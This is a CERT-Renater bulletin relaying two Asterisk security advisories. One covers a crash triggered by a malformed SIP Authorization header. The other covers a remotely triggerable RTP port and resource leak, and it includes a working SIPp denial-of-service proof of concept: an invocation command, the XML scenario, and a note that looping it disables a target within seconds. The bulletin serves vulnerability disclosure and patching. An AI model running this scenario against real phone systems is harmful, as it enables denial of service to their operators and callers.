Ce mail provient de l'extérieur, restons vigilants

=====================================================================

                            CERT-Renater

                Note d'Information No. 2025/VULN559
_____________________________________________________________________

DATE                : 29/08/2025

HARDWARE PLATFORM(S): /

OPERATING SYSTEM(S): Systems running Asterisk versions prior to
                           22.5.2, 21.10.2, 20.15.2.

=====================================================================
https://github.com/asterisk/asterisk/security/advisories/GHSA-64qc-9x89-rx5j
https://github.com/asterisk/asterisk/security/advisories/GHSA-557q-795j-wfx2
_____________________________________________________________________

A specifically malformed Authorization header in an incoming SIP
request can cause Asterisk to crash

High
gtjoseph published GHSA-64qc-9x89-rx5j Aug 28, 2025

Package
asterisk (Asterisk)

Affected versions
<= 22.5.1
<= 21.10.1
<= 20.15.1

Patched versions
22.5.2
21.10.2
20.15.2


Description

Impact

If a SIP request is received with an Authorization header that
contains a realm that wasn't in a previous 401 response's
WWW-Authenticate header, or an Authorization header with an
incorrect realm was received without a previous 401 response being
sent, the get_authorization_header() function in
res_pjsip_authenticator_digest will return a NULL. This wasn't being
checked before attempting to get the digest algorithm from the
header which causes a SEGV.


Workarounds

There are no workarounds.


Severity
High
7.5/ 10

CVSS v3 base metrics
Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
None
Availability
High
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE ID
CVE-2025-57767

Weaknesses
CWE-253


Credits

    @pc-m pc-m Finder

_____________________________________________________________________


Resource exhaustion (DoS) vulnerability: remotely exploitable leak
of RTP UDP ports and internal resources

Moderate
gtjoseph published GHSA-557q-795j-wfx2 Aug 28, 2025


Package
asterisk (Asterisk)

Affected versions
<= 18.26.3
<= 18.9-cert16

Patched versions
18.26.4
18.9-cert17


Description

Summary

I am not sure what happens there, but the simulation posted below
causes Asterisk 18.26.3 and earlier 18.x (not yet tested on 20.x)
to leak RTP UDP ports and internal resources. First encountered
in the wild, then cleanly reproduced.


Details

Environment: FreePBX 16, Asterisk 18.26.3 (also works on older
Asterisk versions), PJSIP.

Transports: works on all: UDP, TCP, TLS.

Specifics:

Anonymous endpoint in PJSIP:

[anonymous]
type=endpoint
context=from-sip-external
allow=alaw,ulaw,gsm

Target context (from-sip-external):

[from-sip-external]
exten => _.,1,NoOp(Received incoming SIP connection from unknown peer to ${EXTEN})
exten => _.,n,Set(DID=${IF($["${EXTEN:1:2}"=""]?s:${EXTEN})})
exten => _.,n,Goto(s,1)
exten => s,1,GotoIf($["${SIPLANG}"!=""]?setlanguage:checkanon)
exten => s,n(setlanguage),Set(CHANNEL(language)=${SIPLANG})
exten => s,n(checkanon),GotoIf($["${ALLOW_SIP_ANON}"!="yes"]?noanonymous)
exten => s,n,Goto(from-trunk,${DID},1)
exten => s,n(noanonymous),Set(TIMEOUT(absolute)=15)
exten => s,n,Set(receveip=${IF($["${CUT(CHANNEL,/,1)}" != "PJSIP"]?recvip:pjsip,remote_addr)})
exten => s,n,Log(WARNING,"Rejecting unknown SIP connection from ${CHANNEL(${receveip})}")
exten => s,n,Answer
exten => s,n,Wait(2)
exten => s,n,Playback(ss-noservice)
exten => s,n,Playtones(congestion)
exten => s,n,Congestion(5)
exten => h,1,Hangup
exten => i,1,Hangup
exten => t,1,Hangup

What's important, the call is not considered terminating and
continues through dialplan until hangup even if TCP/TLS
connection breaks.

Can be reduced just to:

[from-sip-external]
exten => _.,1,NoOp(Received incoming SIP connection from unknown peer to ${EXTEN})
exten => _.,n,Answer
exten => _.,n,Hangup

Still allows to reproduce the issue.


PoC

SIPP-based issue reproducing script (test.xml):

Invocation: sipp -sf test.xml -t u1 -s 1001 -key callto "88880000441613940229" -recv_timeout 3000 -send_timeout 3000 -rtp_echo -m 1 [target Asterisk PBX IP]

The culprit seems to be branch=012345678. Changing this to proper
branch ID ([branch] in SIPP terms) eliminates the issue and BYE
requests are received during the session, the resources are freed.


<?xml version="1.0" encoding="ISO-8859-1" ?>
<!DOCTYPE scenario SYSTEM "sipp.dtd">

<scenario name="asterisk_leak_test">
  <send retrans="1000">
    <![CDATA[
      INVITE sip:[callto]@[remote_ip] SIP/2.0
      Via: SIP/2.0/[transport] [local_ip]:[local_port];branch=012345678
      From:  <sip:[service]@[remote_ip]>;tag=72618e6f
      To:  <sip:[callto]@[remote_ip]>
      Contact: <sip:[service]@[local_ip]:[local_port];transport=[transport]>;expires=60
      Call-ID: [call_id]
      CSeq: [cseq] INVITE
      Max-Forwards: 70
      User-Agent: cisco
      Allow: INVITE, REGISTER, ACK, CANCEL, BYE, NOTIFY, REFER, OPTIONS, INFO, SUBSCRIBE, UPDATE, PRACK, MESSAGE
      Content-Length: 0
    ]]>
  </send>

  <recv response="100" optional="true">
  </recv>
  <recv response="180" optional="true">
  </recv>
  <recv response="183" optional="true">
  </recv>
  <recv response="200" next="do_ack">
  </recv>

  <label id="do_ack" />

  <send>
    <![CDATA[
      ACK sip:[remote_ip]:[remote_port];transport=[transport] SIP/2.0
      Via: SIP/2.0/[transport] [local_ip]:[local_port];rport=[local_port];received=[local_ip];branch=012345678
      From:  <sip:[service]@[local_ip]>;tag=72618e6f
      To:  <sip:[callto]@[remote_ip]>[peer_tag_param]
      Call-ID: [call_id]
      CSeq: [cseq] ACK
      Max-Forwards: 70
      Content-Length: 0
    ]]>
  </send>

  <pause milliseconds="3000">
  </pause>
</scenario>

Expected outcome: BYE received during the session due to session
rejected context terminating the call.

Actual outcome: nothing received after ACK, Asterisk leaks resources.

Can be repeated as much as necessary in a tight loop (even removing
pause which exists just to catch BYE) to quickly exhaust RTP port
range. Obviously removing pause and looping this towards the target
makes it inoperational in seconds.


Impact

Resource exhaustion. UDP RTP ports are not closed, module show
command shows leaking module usage counters (they grow with each
call).

Sample:

Module                         Description                              Use Count  Status      Support Level
chan_pjsip.so                  PJSIP Channel Driver                     625        Running              core
res_pjsip.so                   Basic SIP resource                       153        Running              core
res_pjsip_aoc.so               PJSIP AOC Support                        208        Running          extended
res_pjsip_caller_id.so         PJSIP Caller ID Support                  105        Running              core
res_pjsip_diversion.so         PJSIP Add Diversion Header Support       105        Running              core
res_pjsip_dlg_options.so       SIP OPTIONS in dialog handler            104        Running              core
res_pjsip_dtmf_info.so         PJSIP DTMF INFO Support                  104        Running              core
res_pjsip_empty_info.so        PJSIP Empty INFO Support                 104        Running              core
res_pjsip_geolocation.so       res_pjsip_geolocation Module for Asteris 104        Running              core
res_pjsip_header_funcs.so      PJSIP Header Functions                   104        Running              core
res_pjsip_messaging.so         PJSIP Messaging Support                  104        Running              core
res_pjsip_nat.so               PJSIP NAT Support                        104        Running              core
res_pjsip_one_touch_record_info.so PJSIP INFO One Touch Recording Support   104        Running              core
res_pjsip_path.so              PJSIP Path Header Support                104        Running              core
res_pjsip_refer.so             PJSIP Blind and Attended Transfer Suppor 105        Running              core
res_pjsip_rfc3326.so           PJSIP RFC3326 Support                    104        Running              core
res_pjsip_rfc3329.so           PJSIP RFC3329 Support (partial)          104        Running              core
res_pjsip_sdp_rtp.so           PJSIP SDP RTP/AVP stream handler         104        Running              core
res_pjsip_send_to_voicemail.so PJSIP REFER Send to Voicemail Support    104        Running              core
res_pjsip_session.so           PJSIP Session resource                   124        Running              core
res_pjsip_t38.so               PJSIP T.38 UDPTL Support                 104        Running              core
res_pjsip_transport_websocket.so PJSIP WebSocket Transport Support        104        Running              core
res_rtp_asterisk.so            Asterisk RTP Stack                       108        Running              core

(all of these grow on each exploiting call)


Severity
Moderate
6.5/ 10

CVSS v3 base metrics
Attack vector
Network
Attack complexity
Low
Privileges required
Low
User interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
None
Availability
High
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE ID
CVE-2025-54995

Weaknesses
Weakness CWE-1286

Credits

    @AlexAT AlexAT Reporter


=========================================================
+ CERT-RENATER        |    tel : 01-53-94-20-44         +
+ 23/25 Rue Daviel    |    fax : 01-53-94-20-41         +
+ 75013 Paris         |   email:cert@support.renater.fr +
=========================================================